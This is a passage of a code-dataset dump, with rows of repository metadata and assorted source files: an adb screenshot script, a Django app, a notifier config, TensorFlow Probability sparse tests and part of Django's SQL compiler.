blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 2
616
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
69
| license_type
stringclasses 2
values | repo_name
stringlengths 5
118
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringlengths 4
63
| visit_date
timestamp[us] | revision_date
timestamp[us] | committer_date
timestamp[us] | github_id
int64 2.91k
686M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 23
values | gha_event_created_at
timestamp[us] | gha_created_at
timestamp[us] | gha_language
stringclasses 213
values | src_encoding
stringclasses 30
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 2
10.3M
| extension
stringclasses 246
values | content
stringlengths 2
10.3M
| authors
listlengths 1
1
| author_id
stringlengths 0
212
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
9446b56384f1741e397ae19977d5a6629a625280
|
8d51d35013a4081af42a5d2388c4df960b01ead5
|
/adb_screen.py
|
69fe5f88c496d65de655502e369e1f931f7fc076
|
[] |
no_license
|
1998Don/ledi_git
|
9eae06c6a1c36736f74a56499f52266fd125ea4d
|
b05487361a5536593c842d2587adf0787e7390b1
|
refs/heads/master
| 2023-05-18T03:45:41.772941
| 2021-06-11T04:19:00
| 2021-06-11T04:19:00
| 353,873,956
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 530
|
py
|
import os
import time
class ScreenRobot:
def screen(self,count):
# 截屏
os.system(f"adb shell screencap -p /sdcard/{count}.png")
if __name__ == '__main__':
count = 1
robot = ScreenRobot()
while True:
try:
robot.screen(count)
os.system(f"adb pull -a /sdcard/{count}.png")
print(time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time())), f'picture{count}.png')
time.sleep(0.5)
count += 1
except:
break
|
[
"oncwnuBR4VQqq5cn8LD3J51PreWA@git.weixin.qq.com"
] |
oncwnuBR4VQqq5cn8LD3J51PreWA@git.weixin.qq.com
|
1c97b935612b094e79e1637a5a338585a5833fb8
|
3685ccf0910e7780421a57ca15ca5381510390ea
|
/schema_registry/schema_registry/extensions.py
|
a1795b787268361c9b7348c63bd46a7d77b867fc
|
[] |
no_license
|
winex888/federation_graphql
|
9db3e5d6d75a9433906bb5cff34d7fd043380caa
|
00e296ad36b82083c2e16d4800b59cd6b0e2d66e
|
refs/heads/main
| 2023-08-03T09:37:11.038257
| 2023-07-24T10:28:53
| 2023-07-24T10:28:53
| 360,777,023
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,168
|
py
|
import logging
from schema_registry.api.models import db
from schema_registry.conf import settings
async def init_db(_app) -> None:
"""
Инициализация подключения к бд
"""
logging.info('Подключение к БД... ({db_dsn})'.format(db_dsn=settings.DB_DSN))
await db.set_bind(
settings.DB_DSN,
echo=settings.POSTGRES.echo,
min_size=settings.POSTGRES.pool_min_size,
max_size=settings.POSTGRES.pool_max_size,
ssl=settings.POSTGRES.ssl,
)
try:
await db.scalar('select now()')
logging.info('Подключение к БД прошло успешно')
except ConnectionRefusedError as ex:
logging.error(
'Ошибка подключение к БД... ({db_dsn}), ошибка: {errors}'.format(
db_dsn=settings.DB_DSN,
errors=ex.strerror,
),
)
async def close_db(_app) -> None:
"""
Отключение подключения к бд
"""
logging.info('Отключение подключения к базе дынных...')
await db.pop_bind().close()
|
[
"winex888@mail.ru"
] |
winex888@mail.ru
|
4bc54103403acae606e53e6f343613459226f1bf
|
e0709b5108445182a64a64acd1fc0523c903aeea
|
/app/urls.py
|
c89c2f3f558822e0ec6f837c824a2b2e3daf3a94
|
[] |
no_license
|
SusanaPavez/ninja-gold
|
1c26fa40aeabf0d45580f02c72861a55d3e7726a
|
2f02eab0acefa5acb6da2653bc8c57eaf2770b95
|
refs/heads/master
| 2023-07-09T20:25:05.218740
| 2021-08-10T00:50:36
| 2021-08-10T00:50:36
| 394,426,269
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 162
|
py
|
from django.urls import path
from . import views
urlpatterns = [
path('', views.index),
path('juegos/' , views.juego),
path('reset/', views.reset),
]
|
[
"susana.pavez@gmail.com"
] |
susana.pavez@gmail.com
|
331e2392e43bde4b749c5989c07d18264418908c
|
5a3264c41ded21d24d03bc38063468b45505e0e2
|
/venv/lib/python3.6/keyword.py
|
0538dd34072883fdef176cce0915897d0f4ca804
|
[] |
no_license
|
vjs3/playing-with-flask
|
e4635912550ef5317eac99c507fc43c860ccd4fc
|
d2ef8f80a0501752e4a249543c883877cba35f0d
|
refs/heads/master
| 2020-03-23T10:21:05.605400
| 2018-07-18T12:41:07
| 2018-07-18T12:41:07
| 141,438,422
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 47
|
py
|
/Users/vjs3/miniconda3/lib/python3.6/keyword.py
|
[
"vishwajeet.srivastava@produktmacher.com"
] |
vishwajeet.srivastava@produktmacher.com
|
85596fb3ff870c316d4d7b3553f515d5d673f9b9
|
2bb90b620f86d0d49f19f01593e1a4cc3c2e7ba8
|
/pardus/tags/2007/desktop/kde/autostart/actions.py
|
5bd7b2827ebfb6bdfc4093743e2fb7ed2daacc96
|
[] |
no_license
|
aligulle1/kuller
|
bda0d59ce8400aa3c7ba9c7e19589f27313492f7
|
7f98de19be27d7a517fe19a37c814748f7e18ba6
|
refs/heads/master
| 2021-01-20T02:22:09.451356
| 2013-07-23T17:57:58
| 2013-07-23T17:57:58
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 286
|
py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Licensed under the GNU General Public License, version 2.
# See the file http://www.gnu.org/copyleft/gpl.txt.
from pisi.actionsapi import kde
def setup():
kde.configure()
def build():
kde.make()
def install():
kde.install()
|
[
"yusuf.aydemir@istanbul.com"
] |
yusuf.aydemir@istanbul.com
|
219eae34810f92508e8de57b2ebb97decce009db
|
74f5cf339f3d8233d04d3a0be55231d9105bb983
|
/notifier/config.py
|
2ab3c76b41fbdecf7373a627b9966896ac77a6dc
|
[] |
no_license
|
camvi/sample
|
eac77d9fc8e4d6898894c763917a5195158fb666
|
24a8c0ee53ed87cc20a4e3dc7c11860e91265f27
|
refs/heads/master
| 2020-04-16T12:36:04.430211
| 2019-07-16T20:00:05
| 2019-07-16T20:00:05
| 165,587,135
| 2
| 3
| null | 2019-10-30T23:56:05
| 2019-01-14T03:08:48
|
C++
|
UTF-8
|
Python
| false
| false
| 399
|
py
|
email_options = {
"from_addr": '',
"from_addr_password": '',
"smtp_server": '',
"smtp_port": 587,
"ssl": False,
"to_addr": "",
"enabled": False
}
twilio_options = {
'sid': '',
'token': '',
'phone': '',
'to_phone': "",
"enabled": False
}
camvi_options = {
"ip": 'localhost',
"port": '8080',
"username": 'admin',
"password": 'admin'
}
|
[
"steven.kan@camvitech.com"
] |
steven.kan@camvitech.com
|
a3c03bb30d7ab9d2444696500ece8c13bfd13edd
|
2fabea234735beefc980b77b213fcb0dfb394980
|
/tensorflow_probability/python/math/sparse_test.py
|
aca018215524f5574b3df657c781c4d51d85533d
|
[
"Apache-2.0"
] |
permissive
|
tarrou/probability
|
0eee452b525a6e6b3c7c98d467468e47f07e861b
|
d4d80a1c04ad0b3e98758ebc3f7f82887274384d
|
refs/heads/master
| 2020-08-08T11:16:42.441268
| 2019-12-06T17:35:17
| 2019-12-06T17:35:17
| 213,819,828
| 0
| 0
|
Apache-2.0
| 2019-10-09T04:20:19
| 2019-10-09T04:20:19
| null |
UTF-8
|
Python
| false
| false
| 6,549
|
py
|
# Copyright 2018 The TensorFlow Probability Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Tests for sparse ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# Dependency imports
import numpy as np
import tensorflow.compat.v1 as tf1
import tensorflow.compat.v2 as tf
import tensorflow_probability as tfp
from tensorflow_probability.python.internal import test_case
from tensorflow.python.framework import test_util # pylint: disable=g-direct-tensorflow-import
def _assert_sparse_tensor_value(test_case_instance, expected, actual):
test_case_instance.assertEqual(np.int64, np.array(actual.indices).dtype)
test_case_instance.assertAllEqual(expected.indices, actual.indices)
test_case_instance.assertEqual(
np.array(expected.values).dtype, np.array(actual.values).dtype)
test_case_instance.assertAllEqual(expected.values, actual.values)
test_case_instance.assertEqual(np.int64, np.array(actual.dense_shape).dtype)
test_case_instance.assertAllEqual(expected.dense_shape, actual.dense_shape)
@test_util.run_all_in_graph_and_eager_modes
class SparseTest(test_case.TestCase):
# Copied (with modifications) from:
# tensorflow/contrib/layers/python/ops/sparse_ops.py.
def test_dense_to_sparse_1d(self):
st = tfp.math.dense_to_sparse([1, 0, 2, 0])
result = self.evaluate(st)
self.assertEqual(result.indices.dtype, np.int64)
self.assertEqual(result.values.dtype, np.int32)
self.assertEqual(result.dense_shape.dtype, np.int64)
self.assertAllEqual([[0], [2]], result.indices)
self.assertAllEqual([1, 2], result.values)
self.assertAllEqual([4], result.dense_shape)
def test_dense_to_sparse_1d_float(self):
st = tfp.math.dense_to_sparse([1.5, 0.0, 2.3, 0.0])
result = self.evaluate(st)
self.assertEqual(result.indices.dtype, np.int64)
self.assertEqual(result.values.dtype, np.float32)
self.assertEqual(result.dense_shape.dtype, np.int64)
self.assertAllEqual([[0], [2]], result.indices)
self.assertAllClose([1.5, 2.3], result.values)
self.assertAllEqual([4], result.dense_shape)
def test_dense_to_sparse_1d_bool(self):
st = tfp.math.dense_to_sparse([True, False, True, False])
result = self.evaluate(st)
self.assertEqual(result.indices.dtype, np.int64)
self.assertEqual(result.values.dtype, np.bool)
self.assertEqual(result.dense_shape.dtype, np.int64)
self.assertAllEqual([[0], [2]], result.indices)
self.assertAllEqual([True, True], result.values)
self.assertAllEqual([4], result.dense_shape)
def test_dense_to_sparse_1d_str(self):
st = tfp.math.dense_to_sparse([b'qwe', b'', b'ewq', b''])
result = self.evaluate(st)
self.assertEqual(result.indices.dtype, np.int64)
self.assertEqual(result.values.dtype, np.object)
self.assertEqual(result.dense_shape.dtype, np.int64)
self.assertAllEqual([[0], [2]], result.indices)
self.assertAllEqual([b'qwe', b'ewq'], result.values)
self.assertAllEqual([4], result.dense_shape)
def test_dense_to_sparse_1d_str_special_ignore(self):
st = tfp.math.dense_to_sparse(
[b'qwe', b'', b'ewq', b''], ignore_value=b'qwe')
result = self.evaluate(st)
self.assertEqual(result.indices.dtype, np.int64)
self.assertEqual(result.values.dtype, np.object)
self.assertEqual(result.dense_shape.dtype, np.int64)
self.assertAllEqual([[1], [2], [3]], result.indices)
self.assertAllEqual([b'', b'ewq', b''], result.values)
self.assertAllEqual([4], result.dense_shape)
def test_dense_to_sparse_2d(self):
st = tfp.math.dense_to_sparse([[1, 2, 0, 0], [3, 4, 5, 0]])
result = self.evaluate(st)
self.assertAllEqual([[0, 0], [0, 1], [1, 0], [1, 1], [1, 2]],
result.indices)
self.assertAllEqual([1, 2, 3, 4, 5], result.values)
self.assertAllEqual([2, 4], result.dense_shape)
def test_dense_to_sparse_3d(self):
st = tfp.math.dense_to_sparse(
[[[1, 2, 0, 0],
[3, 4, 5, 0]],
[[7, 8, 0, 0],
[9, 0, 0, 0]]])
result = self.evaluate(st)
self.assertAllEqual(
[[0, 0, 0],
[0, 0, 1],
[0, 1, 0],
[0, 1, 1],
[0, 1, 2],
[1, 0, 0],
[1, 0, 1],
[1, 1, 0]],
result.indices)
self.assertAllEqual([1, 2, 3, 4, 5, 7, 8, 9], result.values)
self.assertAllEqual([2, 2, 4], result.dense_shape)
def test_dense_to_sparse_unknown_1d_shape(self):
tensor = tf1.placeholder_with_default(
np.array([0, 100, 0, 3], np.int32), shape=[None])
st = tfp.math.dense_to_sparse(tensor)
result = self.evaluate(st)
self.assertAllEqual([[1], [3]], result.indices)
self.assertAllEqual([100, 3], result.values)
self.assertAllEqual([4], result.dense_shape)
def test_dense_to_sparse_unknown_3d_shape(self):
tensor = tf1.placeholder_with_default(
np.array([[[1, 2, 0, 0], [3, 4, 5, 0]], [[7, 8, 0, 0], [9, 0, 0, 0]]],
np.int32),
shape=[None, None, None])
st = tfp.math.dense_to_sparse(tensor)
result = self.evaluate(st)
self.assertAllEqual(
[[0, 0, 0],
[0, 0, 1],
[0, 1, 0],
[0, 1, 1],
[0, 1, 2],
[1, 0, 0],
[1, 0, 1],
[1, 1, 0]],
result.indices)
self.assertAllEqual([1, 2, 3, 4, 5, 7, 8, 9], result.values)
self.assertAllEqual([2, 2, 4], result.dense_shape)
def test_dense_to_sparse_unknown_rank(self):
ph = tf1.placeholder_with_default(
np.array([[1, 2, 0, 0], [3, 4, 5, 0]], np.int32), shape=None)
st = tfp.math.dense_to_sparse(ph)
result = self.evaluate(st)
self.assertAllEqual(
[[0, 0],
[0, 1],
[1, 0],
[1, 1],
[1, 2]],
result.indices)
self.assertAllEqual([1, 2, 3, 4, 5], result.values)
self.assertAllEqual([2, 4], result.dense_shape)
if __name__ == '__main__':
tf.test.main()
|
[
"gardener@tensorflow.org"
] |
gardener@tensorflow.org
|
b103132e0bee93fd37295128ccea5a1e416e708e
|
3cdb4faf34d8375d6aee08bcc523adadcb0c46e2
|
/web/env/lib/python3.6/site-packages/django/db/models/sql/compiler.py
|
27b8cc343b29121d30713bacbde5e9dfc595aef5
|
[
"MIT",
"GPL-3.0-only"
] |
permissive
|
rizwansoaib/face-attendence
|
bc185d4de627ce5adab1cda7da466cb7a5fddcbe
|
59300441b52d32f3ecb5095085ef9d448aef63af
|
refs/heads/master
| 2020-04-25T23:47:47.303642
| 2019-09-12T14:26:17
| 2019-09-12T14:26:17
| 173,157,284
| 45
| 12
|
MIT
| 2020-02-11T23:47:55
| 2019-02-28T17:33:14
|
Python
|
UTF-8
|
Python
| false
| false
| 67,037
|
py
|
import collections
import functools
import re
import warnings
from itertools import chain
from django.core.exceptions import EmptyResultSet, FieldError
from django.db.models.constants import LOOKUP_SEP
from django.db.models.expressions import OrderBy, Random, RawSQL, Ref
from django.db.models.query_utils import QueryWrapper, select_related_descend
from django.db.models.sql.constants import (
CURSOR, GET_ITERATOR_CHUNK_SIZE, MULTI, NO_RESULTS, ORDER_DIR, SINGLE,
)
from django.db.models.sql.query import Query, get_order_dir
from django.db.transaction import TransactionManagementError
from django.db.utils import DatabaseError, NotSupportedError
from django.utils.deprecation import RemovedInDjango30Warning
from django.utils.inspect import func_supports_parameter
FORCE = object()
class SQLCompiler:
def __init__(self, query, connection, using):
self.query = query
self.connection = connection
self.using = using
self.quote_cache = {'*': '*'}
# The select, klass_info, and annotations are needed by QuerySet.iterator()
# these are set as a side-effect of executing the query. Note that we calculate
# separately a list of extra select columns needed for grammatical correctness
# of the query, but these columns are not included in self.select.
self.select = None
self.annotation_col_map = None
self.klass_info = None
self.ordering_parts = re.compile(r'(.*)\s(ASC|DESC)(.*)')
def setup_query(self):
if all(self.query.alias_refcount[a] == 0 for a in self.query.alias_map):
self.query.get_initial_alias()
self.select, self.klass_info, self.annotation_col_map = self.get_select()
self.col_count = len(self.select)
def pre_sql_setup(self):
"""
Do any necessary class setup immediately prior to producing SQL. This
is for things that can't necessarily be done in __init__ because we
might not have all the pieces in place at that time.
"""
self.setup_query()
order_by = self.get_order_by()
self.where, self.having = self.query.where.split_having()
extra_select = self.get_extra_select(order_by, self.select)
self.has_extra_select = bool(extra_select)
group_by = self.get_group_by(self.select + extra_select, order_by)
return extra_select, order_by, group_by
def get_group_by(self, select, order_by):
"""
Return a list of 2-tuples of form (sql, params).
The logic of what exactly the GROUP BY clause contains is hard
to describe in other words than "if it passes the test suite,
then it is correct".
"""
# Some examples:
# SomeModel.objects.annotate(Count('somecol'))
# GROUP BY: all fields of the model
#
# SomeModel.objects.values('name').annotate(Count('somecol'))
# GROUP BY: name
#
# SomeModel.objects.annotate(Count('somecol')).values('name')
# GROUP BY: all cols of the model
#
# SomeModel.objects.values('name', 'pk').annotate(Count('somecol')).values('pk')
# GROUP BY: name, pk
#
# SomeModel.objects.values('name').annotate(Count('somecol')).values('pk')
# GROUP BY: name, pk
#
# In fact, the self.query.group_by is the minimal set to GROUP BY. It
# can't be ever restricted to a smaller set, but additional columns in
# HAVING, ORDER BY, and SELECT clauses are added to it. Unfortunately
# the end result is that it is impossible to force the query to have
# a chosen GROUP BY clause - you can almost do this by using the form:
# .values(*wanted_cols).annotate(AnAggregate())
# but any later annotations, extra selects, values calls that
# refer some column outside of the wanted_cols, order_by, or even
# filter calls can alter the GROUP BY clause.
# The query.group_by is either None (no GROUP BY at all), True
# (group by select fields), or a list of expressions to be added
# to the group by.
if self.query.group_by is None:
return []
expressions = []
if self.query.group_by is not True:
# If the group by is set to a list (by .values() call most likely),
# then we need to add everything in it to the GROUP BY clause.
# Backwards compatibility hack for setting query.group_by. Remove
# when we have public API way of forcing the GROUP BY clause.
# Converts string references to expressions.
for expr in self.query.group_by:
if not hasattr(expr, 'as_sql'):
expressions.append(self.query.resolve_ref(expr))
else:
expressions.append(expr)
# Note that even if the group_by is set, it is only the minimal
# set to group by. So, we need to add cols in select, order_by, and
# having into the select in any case.
for expr, _, _ in select:
cols = expr.get_group_by_cols()
for col in cols:
expressions.append(col)
for expr, (sql, params, is_ref) in order_by:
# Skip References to the select clause, as all expressions in the
# select clause are already part of the group by.
if not expr.contains_aggregate and not is_ref:
expressions.extend(expr.get_source_expressions())
having_group_by = self.having.get_group_by_cols() if self.having else ()
for expr in having_group_by:
expressions.append(expr)
result = []
seen = set()
expressions = self.collapse_group_by(expressions, having_group_by)
for expr in expressions:
sql, params = self.compile(expr)
if (sql, tuple(params)) not in seen:
result.append((sql, params))
seen.add((sql, tuple(params)))
return result
def collapse_group_by(self, expressions, having):
# If the DB can group by primary key, then group by the primary key of
# query's main model. Note that for PostgreSQL the GROUP BY clause must
# include the primary key of every table, but for MySQL it is enough to
# have the main table's primary key.
if self.connection.features.allows_group_by_pk:
# Determine if the main model's primary key is in the query.
pk = None
for expr in expressions:
# Is this a reference to query's base table primary key? If the
# expression isn't a Col-like, then skip the expression.
if (getattr(expr, 'target', None) == self.query.model._meta.pk and
getattr(expr, 'alias', None) == self.query.base_table):
pk = expr
break
# If the main model's primary key is in the query, group by that
# field, HAVING expressions, and expressions associated with tables
# that don't have a primary key included in the grouped columns.
if pk:
pk_aliases = {
expr.alias for expr in expressions
if hasattr(expr, 'target') and expr.target.primary_key
}
expressions = [pk] + [
expr for expr in expressions
if expr in having or (
getattr(expr, 'alias', None) is not None and expr.alias not in pk_aliases
)
]
elif self.connection.features.allows_group_by_selected_pks:
# Filter out all expressions associated with a table's primary key
# present in the grouped columns. This is done by identifying all
# tables that have their primary key included in the grouped
# columns and removing non-primary key columns referring to them.
# Unmanaged models are excluded because they could be representing
# database views on which the optimization might not be allowed.
pks = {
expr for expr in expressions
if hasattr(expr, 'target') and expr.target.primary_key and expr.target.model._meta.managed
}
aliases = {expr.alias for expr in pks}
expressions = [
expr for expr in expressions if expr in pks or getattr(expr, 'alias', None) not in aliases
]
return expressions
def get_select(self):
"""
Return three values:
- a list of 3-tuples of (expression, (sql, params), alias)
- a klass_info structure,
- a dictionary of annotations
The (sql, params) is what the expression will produce, and alias is the
"AS alias" for the column (possibly None).
The klass_info structure contains the following information:
- The base model of the query.
- Which columns for that model are present in the query (by
position of the select clause).
- related_klass_infos: [f, klass_info] to descent into
The annotations is a dictionary of {'attname': column position} values.
"""
select = []
klass_info = None
annotations = {}
select_idx = 0
for alias, (sql, params) in self.query.extra_select.items():
annotations[alias] = select_idx
select.append((RawSQL(sql, params), alias))
select_idx += 1
assert not (self.query.select and self.query.default_cols)
if self.query.default_cols:
cols = self.get_default_columns()
else:
# self.query.select is a special case. These columns never go to
# any model.
cols = self.query.select
if cols:
select_list = []
for col in cols:
select_list.append(select_idx)
select.append((col, None))
select_idx += 1
klass_info = {
'model': self.query.model,
'select_fields': select_list,
}
for alias, annotation in self.query.annotation_select.items():
annotations[alias] = select_idx
select.append((annotation, alias))
select_idx += 1
if self.query.select_related:
related_klass_infos = self.get_related_selections(select)
klass_info['related_klass_infos'] = related_klass_infos
def get_select_from_parent(klass_info):
for ki in klass_info['related_klass_infos']:
if ki['from_parent']:
ki['select_fields'] = (klass_info['select_fields'] +
ki['select_fields'])
get_select_from_parent(ki)
get_select_from_parent(klass_info)
ret = []
for col, alias in select:
try:
sql, params = self.compile(col, select_format=True)
except EmptyResultSet:
# Select a predicate that's always False.
sql, params = '0', ()
ret.append((col, (sql, params), alias))
return ret, klass_info, annotations
def get_order_by(self):
"""
Return a list of 2-tuples of form (expr, (sql, params, is_ref)) for the
ORDER BY clause.
The order_by clause can alter the select clause (for example it
can add aliases to clauses that do not yet have one, or it can
add totally new select clauses).
"""
if self.query.extra_order_by:
ordering = self.query.extra_order_by
elif not self.query.default_ordering:
ordering = self.query.order_by
else:
ordering = (self.query.order_by or self.query.get_meta().ordering or [])
if self.query.standard_ordering:
asc, desc = ORDER_DIR['ASC']
else:
asc, desc = ORDER_DIR['DESC']
order_by = []
for field in ordering:
if hasattr(field, 'resolve_expression'):
if not isinstance(field, OrderBy):
field = field.asc()
if not self.query.standard_ordering:
field.reverse_ordering()
order_by.append((field, False))
continue
if field == '?': # random
order_by.append((OrderBy(Random()), False))
continue
col, order = get_order_dir(field, asc)
descending = order == 'DESC'
if col in self.query.annotation_select:
# Reference to expression in SELECT clause
order_by.append((
OrderBy(Ref(col, self.query.annotation_select[col]), descending=descending),
True))
continue
if col in self.query.annotations:
# References to an expression which is masked out of the SELECT clause
order_by.append((
OrderBy(self.query.annotations[col], descending=descending),
False))
continue
if '.' in field:
# This came in through an extra(order_by=...) addition. Pass it
# on verbatim.
table, col = col.split('.', 1)
order_by.append((
OrderBy(
RawSQL('%s.%s' % (self.quote_name_unless_alias(table), col), []),
descending=descending
), False))
continue
if not self.query._extra or col not in self.query._extra:
# 'col' is of the form 'field' or 'field1__field2' or
# '-field1__field2__field', etc.
order_by.extend(self.find_ordering_name(
field, self.query.get_meta(), default_order=asc))
else:
if col not in self.query.extra_select:
order_by.append((
OrderBy(RawSQL(*self.query.extra[col]), descending=descending),
False))
else:
order_by.append((
OrderBy(Ref(col, RawSQL(*self.query.extra[col])), descending=descending),
True))
result = []
seen = set()
for expr, is_ref in order_by:
if self.query.combinator:
src = expr.get_source_expressions()[0]
# Relabel order by columns to raw numbers if this is a combined
# query; necessary since the columns can't be referenced by the
# fully qualified name and the simple column names may collide.
for idx, (sel_expr, _, col_alias) in enumerate(self.select):
if is_ref and col_alias == src.refs:
src = src.source
elif col_alias:
continue
if src == sel_expr:
expr.set_source_expressions([RawSQL('%d' % (idx + 1), ())])
break
else:
raise DatabaseError('ORDER BY term does not match any column in the result set.')
resolved = expr.resolve_expression(
self.query, allow_joins=True, reuse=None)
sql, params = self.compile(resolved)
# Don't add the same column twice, but the order direction is
# not taken into account so we strip it. When this entire method
# is refactored into expressions, then we can check each part as we
# generate it.
without_ordering = self.ordering_parts.search(sql).group(1)
if (without_ordering, tuple(params)) in seen:
continue
seen.add((without_ordering, tuple(params)))
result.append((resolved, (sql, params, is_ref)))
return result
def get_extra_select(self, order_by, select):
extra_select = []
if self.query.distinct and not self.query.distinct_fields:
select_sql = [t[1] for t in select]
for expr, (sql, params, is_ref) in order_by:
without_ordering = self.ordering_parts.search(sql).group(1)
if not is_ref and (without_ordering, params) not in select_sql:
extra_select.append((expr, (without_ordering, params), None))
return extra_select
def quote_name_unless_alias(self, name):
"""
A wrapper around connection.ops.quote_name that doesn't quote aliases
for table names. This avoids problems with some SQL dialects that treat
quoted strings specially (e.g. PostgreSQL).
"""
if name in self.quote_cache:
return self.quote_cache[name]
if ((name in self.query.alias_map and name not in self.query.table_map) or
name in self.query.extra_select or (
name in self.query.external_aliases and name not in self.query.table_map)):
self.quote_cache[name] = name
return name
r = self.connection.ops.quote_name(name)
self.quote_cache[name] = r
return r
def compile(self, node, select_format=False):
vendor_impl = getattr(node, 'as_' + self.connection.vendor, None)
if vendor_impl:
sql, params = vendor_impl(self, self.connection)
else:
sql, params = node.as_sql(self, self.connection)
if select_format is FORCE or (select_format and not self.query.subquery):
return node.output_field.select_format(self, sql, params)
return sql, params
def get_combinator_sql(self, combinator, all):
features = self.connection.features
compilers = [
query.get_compiler(self.using, self.connection)
for query in self.query.combined_queries if not query.is_empty()
]
if not features.supports_slicing_ordering_in_compound:
for query, compiler in zip(self.query.combined_queries, compilers):
if query.low_mark or query.high_mark:
raise DatabaseError('LIMIT/OFFSET not allowed in subqueries of compound statements.')
if compiler.get_order_by():
raise DatabaseError('ORDER BY not allowed in subqueries of compound statements.')
parts = ()
for compiler in compilers:
try:
# If the columns list is limited, then all combined queries
# must have the same columns list. Set the selects defined on
# the query on all combined queries, if not already set.
if not compiler.query.values_select and self.query.values_select:
compiler.query.set_values((
*self.query.extra_select,
*self.query.values_select,
*self.query.annotation_select,
))
parts += (compiler.as_sql(),)
except EmptyResultSet:
# Omit the empty queryset with UNION and with DIFFERENCE if the
# first queryset is nonempty.
if combinator == 'union' or (combinator == 'difference' and parts):
continue
raise
if not parts:
raise EmptyResultSet
combinator_sql = self.connection.ops.set_operators[combinator]
if all and combinator == 'union':
combinator_sql += ' ALL'
braces = '({})' if features.supports_slicing_ordering_in_compound else '{}'
sql_parts, args_parts = zip(*((braces.format(sql), args) for sql, args in parts))
result = [' {} '.format(combinator_sql).join(sql_parts)]
params = []
for part in args_parts:
params.extend(part)
return result, params
def as_sql(self, with_limits=True, with_col_aliases=False):
"""
Create the SQL for this query. Return the SQL string and list of
parameters.
If 'with_limits' is False, any limit/offset information is not included
in the query.
"""
refcounts_before = self.query.alias_refcount.copy()
try:
extra_select, order_by, group_by = self.pre_sql_setup()
for_update_part = None
# Is a LIMIT/OFFSET clause needed?
with_limit_offset = with_limits and (self.query.high_mark is not None or self.query.low_mark)
combinator = self.query.combinator
features = self.connection.features
if combinator:
if not getattr(features, 'supports_select_{}'.format(combinator)):
raise NotSupportedError('{} is not supported on this database backend.'.format(combinator))
result, params = self.get_combinator_sql(combinator, self.query.combinator_all)
else:
distinct_fields, distinct_params = self.get_distinct()
# This must come after 'select', 'ordering', and 'distinct'
# (see docstring of get_from_clause() for details).
from_, f_params = self.get_from_clause()
where, w_params = self.compile(self.where) if self.where is not None else ("", [])
having, h_params = self.compile(self.having) if self.having is not None else ("", [])
result = ['SELECT']
params = []
if self.query.distinct:
distinct_result, distinct_params = self.connection.ops.distinct_sql(
distinct_fields,
distinct_params,
)
result += distinct_result
params += distinct_params
out_cols = []
col_idx = 1
for _, (s_sql, s_params), alias in self.select + extra_select:
if alias:
s_sql = '%s AS %s' % (s_sql, self.connection.ops.quote_name(alias))
elif with_col_aliases:
s_sql = '%s AS %s' % (s_sql, 'Col%d' % col_idx)
col_idx += 1
params.extend(s_params)
out_cols.append(s_sql)
result += [', '.join(out_cols), 'FROM', *from_]
params.extend(f_params)
if self.query.select_for_update and self.connection.features.has_select_for_update:
if self.connection.get_autocommit():
raise TransactionManagementError('select_for_update cannot be used outside of a transaction.')
if with_limit_offset and not self.connection.features.supports_select_for_update_with_limit:
raise NotSupportedError(
'LIMIT/OFFSET is not supported with '
'select_for_update on this database backend.'
)
nowait = self.query.select_for_update_nowait
skip_locked = self.query.select_for_update_skip_locked
of = self.query.select_for_update_of
# If it's a NOWAIT/SKIP LOCKED/OF query but the backend
# doesn't support it, raise NotSupportedError to prevent a
# possible deadlock.
if nowait and not self.connection.features.has_select_for_update_nowait:
raise NotSupportedError('NOWAIT is not supported on this database backend.')
elif skip_locked and not self.connection.features.has_select_for_update_skip_locked:
raise NotSupportedError('SKIP LOCKED is not supported on this database backend.')
elif of and not self.connection.features.has_select_for_update_of:
raise NotSupportedError('FOR UPDATE OF is not supported on this database backend.')
for_update_part = self.connection.ops.for_update_sql(
nowait=nowait,
skip_locked=skip_locked,
of=self.get_select_for_update_of_arguments(),
)
if for_update_part and self.connection.features.for_update_after_from:
result.append(for_update_part)
if where:
result.append('WHERE %s' % where)
params.extend(w_params)
grouping = []
for g_sql, g_params in group_by:
grouping.append(g_sql)
params.extend(g_params)
if grouping:
if distinct_fields:
raise NotImplementedError('annotate() + distinct(fields) is not implemented.')
order_by = order_by or self.connection.ops.force_no_ordering()
result.append('GROUP BY %s' % ', '.join(grouping))
if having:
result.append('HAVING %s' % having)
params.extend(h_params)
if self.query.explain_query:
result.insert(0, self.connection.ops.explain_query_prefix(
self.query.explain_format,
**self.query.explain_options
))
if order_by:
ordering = []
for _, (o_sql, o_params, _) in order_by:
ordering.append(o_sql)
params.extend(o_params)
result.append('ORDER BY %s' % ', '.join(ordering))
if with_limit_offset:
result.append(self.connection.ops.limit_offset_sql(self.query.low_mark, self.query.high_mark))
if for_update_part and not self.connection.features.for_update_after_from:
result.append(for_update_part)
if self.query.subquery and extra_select:
# If the query is used as a subquery, the extra selects would
# result in more columns than the left-hand side expression is
# expecting. This can happen when a subquery uses a combination
# of order_by() and distinct(), forcing the ordering expressions
# to be selected as well. Wrap the query in another subquery
# to exclude extraneous selects.
sub_selects = []
sub_params = []
for index, (select, _, alias) in enumerate(self.select, start=1):
if not alias and with_col_aliases:
alias = 'col%d' % index
if alias:
sub_selects.append("%s.%s" % (
self.connection.ops.quote_name('subquery'),
